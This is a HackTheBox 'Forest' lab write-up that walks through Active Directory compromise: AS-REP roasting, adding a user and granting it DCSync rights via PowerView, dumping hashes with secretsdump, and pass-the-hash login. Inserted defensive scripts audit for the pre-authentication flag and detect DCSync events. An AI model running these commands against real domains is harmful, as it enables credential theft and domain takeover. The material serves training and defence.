Forest Writeup | HackTheBox

nmap scan:

53/tcp   open     domain       syn-ack     Simple DNS Plus
88/tcp   open     kerberos-sec syn-ack     Microsoft Windows Kerberos (server time: 2023-06-26 17:44:12Z)
135/tcp  open     msrpc        syn-ack     Microsoft Windows RPC
139/tcp  open     netbios-ssn  syn-ack     Microsoft Windows netbios-ssn
389/tcp  open     ldap         syn-ack     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
425/tcp  filtered icad-el      no-response
445/tcp  open               syn-ack     Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open     kpasswd5?    syn-ack
593/tcp  open     ncacn_http   syn-ack     Microsoft Windows RPC over HTTP 1.0
636/tcp  open     tcpwrapped   syn-ack
3268/tcp open     ldap         syn-ack     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open     tcpwrapped   syn-ack

Domain: htb.local

Host: FOREST

Enumerating users with enum4linux and ldapsearch

enum4linux -a -u '' -p '' 10.10.10.161

Using ldapsearch to enumerate users and groups:

ldapsearch -x -H ldap://10.10.10.161 -b "dc=htb,dc=local"
ldapsearch -x -H ldap://10.10.10.161 -b "dc=htb,dc=local" "objectclass=user" samaccountName | grep sAMAccountName

After getting the users, save them in a file; after that, I used the GetNPUsers tool from Impacket to get the Kerberos AS-REP hashes.

impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -usersfile users -no-pass

After getting the hash, cracked it using john with the krb5asrep format.

john --format=krb5asrep alfreso.hashes --wordlist=rockyou.txt
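The two steps above (listing users with ldapsearch, then asking the KDC for AS-REP hashes) work because some accounts have "Do not require Kerberos preauthentication" set in userAccountControl. The following script, added here as an example and not part of the original writeup, audits ldapsearch LDIF output for that bit so the condition can be found and removed before anyone roasts it. The LDIF is a constructed sample in the shape the page's ldapsearch query would return if userAccountControl were added to its attribute list; the account names are placeholders, not real Forest data.

```python
"""Audit ldapsearch (LDIF) output for accounts that do not require Kerberos
pre-authentication, i.e. the userAccountControl setting GetNPUsers relies on.

Added example, not part of the original writeup. SAMPLE_LDIF is a constructed
sample (placeholder account names), not real directory data.
"""

# userAccountControl flag bits (documented by Microsoft in MS-SAMR / KB 305144).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample: three accounts, two of them with pre-auth disabled.
# 4260352 = 0x410200 (NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQUIRE_PREAUTH)
# 4194306 = 0x400002 (ACCOUNTDISABLE | DONT_REQUIRE_PREAUTH)
SAMPLE_LDIF = """\
dn: CN=svc-example,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-example
userAccountControl: 4260352

dn: CN=Jane Doe,CN=Users,DC=htb,DC=local
sAMAccountName: jdoe
userAccountControl: 512

dn: CN=old-svc,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: old-svc
userAccountControl: 4194306
"""


def parse_ldif(text):
    """Split LDIF text into entries (dicts).

    Entries are separated by blank lines; a line beginning with a space
    continues the previous attribute value, as the LDIF format specifies.
    """
    entries, current, last_key = [], {}, None
    for raw in text.splitlines():
        if not raw.strip():
            if current:
                entries.append(current)
                current, last_key = {}, None
            continue
        if raw.startswith(" ") and last_key is not None:
            current[last_key] += raw[1:]
            continue
        key, _, value = raw.partition(":")
        last_key = key.strip()
        current[last_key] = value.strip()
    if current:
        entries.append(current)
    return entries


def find_no_preauth_accounts(ldif_text):
    """Return one finding per account whose userAccountControl has
    DONT_REQUIRE_PREAUTH set, with the value the attribute should have
    after the flag is cleared (what unticking the checkbox in ADUC does)."""
    findings = []
    for entry in parse_ldif(ldif_text):
        attrs = {k.lower(): v for k, v in entry.items()}
        if "useraccountcontrol" not in attrs:
            continue
        uac = int(attrs["useraccountcontrol"])
        if uac & UF_DONT_REQUIRE_PREAUTH:
            findings.append({
                "sAMAccountName": attrs.get("samaccountname", "?"),
                "dn": attrs.get("dn", "?"),
                "enabled": not (uac & UF_ACCOUNTDISABLE),
                "password_never_expires": bool(uac & UF_DONT_EXPIRE_PASSWD),
                "remediated_uac": uac & ~UF_DONT_REQUIRE_PREAUTH,
            })
    return findings


if __name__ == "__main__":
    for f in find_no_preauth_accounts(SAMPLE_LDIF):
        state = "ENABLED" if f["enabled"] else "disabled"
        print(f"{f['sAMAccountName']:<12} {state:<8} set userAccountControl to "
              f"{f['remediated_uac']} ({f['dn']})")
```

Disabled accounts with the flag set are still worth listing: they are harmless today but become roastable the moment someone re-enables them. Enabled ones with a password that never expires, as in the sample, are the priority, since a cracked hash stays valid indefinitely.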

After that, connect using evil-winrm. Checking the user's groups found that the user is in the Service Accounts group. After that, run SharpHound.exe and upload the output to BloodHound.

Checking for the shortest path to Domain Admins found that the Exchange Windows Permissions group has “WriteDacl” over Domain Admins.

As I am in the Service Accounts group, I have the ability to create a new user and add it to groups, but not to high-privilege groups. I added a new user and added it to “Exchange Windows Permissions”, and after that used the BloodHound-provided command for the WriteDacl misconfiguration to abuse the DACL.

# adding a new user to the domain (cmd, from the evil-winrm shell)
C:> net user fuser hacker123 /add /domain
# adding the user to the Exchange Windows Permissions group
C:> net group "Exchange Windows Permissions" fuser /add /domain
# PowerShell; Add-DomainObjectAcl comes from PowerView, which must be loaded in the session
# the password must match the one given to net user above
$SecPassword = ConvertTo-SecureString 'hacker123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\fuser', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -Principal fuser -Rights DCSync

After that, used secretsdump to dump the hashes.

$ impacket-secretsdump htb.local/fuser:hacker123@10.10.10.161
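The DCSync right granted above and then exercised by secretsdump leaves a clear trace on the domain controller: a Security event 4662 whose Properties field carries the replication control-access GUIDs, with a subject that is not another DC. The script below, added here as an example and not part of the original writeup, runs that detection over 4662 records exported as JSON lines. It assumes "Audit Directory Service Access" is enabled and a SACL on the domain object logs control-access use, otherwise no 4662 is written at all. The events are a constructed sample; the account names are taken from the writeup, the non-replication GUID is a placeholder.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records.

Added example, not part of the original writeup. SAMPLE_EVENTS is a constructed
sample of 4662 records as JSON lines (field names as in the Windows event XML);
FOREST$ and fuser come from the writeup, everything else is made up.
"""
import json

# Control-access rights whose GUIDs appear in the Properties field of a 4662
# event when a principal replicates directory changes (what secretsdump uses).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
ACCESS_CONTROL_ACCESS = 0x100   # AccessMask bit for "Control Access" (extended rights)

# Constructed sample: DC-to-DC replication (expected), a DCSync by a plain user,
# an unrelated 4662 (placeholder GUID, no control access), and a non-4662 event.
SAMPLE_EVENTS = """\
{"EventID": 4662, "SubjectUserName": "FOREST$", "SubjectDomainName": "HTB", "AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}", "ObjectName": "DC=htb,DC=local"}
{"EventID": 4662, "SubjectUserName": "fuser", "SubjectDomainName": "HTB", "AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}", "ObjectName": "DC=htb,DC=local"}
{"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "HTB", "AccessMask": "0x10", "Properties": "{aaaaaaaa-0000-0000-0000-000000000001}", "ObjectName": "CN=jdoe,CN=Users,DC=htb,DC=local"}
{"EventID": 4624, "SubjectUserName": "fuser", "SubjectDomainName": "HTB"}
"""


def detect_dcsync(jsonl, domain_controllers=frozenset({"FOREST$"})):
    """Return one alert per 4662 event in which a principal that is not a
    known domain controller account exercised a replication right."""
    dc_accounts = {dc.upper() for dc in domain_controllers}
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4662:
            continue
        mask = int(ev.get("AccessMask", "0x0"), 16)
        if not mask & ACCESS_CONTROL_ACCESS:
            continue                      # plain read/write, not an extended right
        props = ev.get("Properties", "").lower()
        rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        if not rights:
            continue                      # some other extended right
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in dc_accounts:
            continue                      # DC-to-DC replication is expected
        alerts.append({
            "subject": f"{ev.get('SubjectDomainName', '')}\\{subject}",
            "object": ev.get("ObjectName"),
            "rights": rights,
        })
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(f"ALERT possible DCSync by {a['subject']} on {a['object']}: "
              f"{', '.join(a['rights'])}")
```

The allow-list of DC machine accounts is environment specific; in a single-DC domain like this one, any replication request from a non-DC account is suspicious on its own. The same event stream also records the preceding step, since Add-DomainObjectAcl writes the domain object's nTSecurityDescriptor and produces a 5136 directory-service-change event that can be alerted on earlier.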

After getting the Administrator NTLM hash, log in as Administrator using the hash.

$ evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6

rooted.
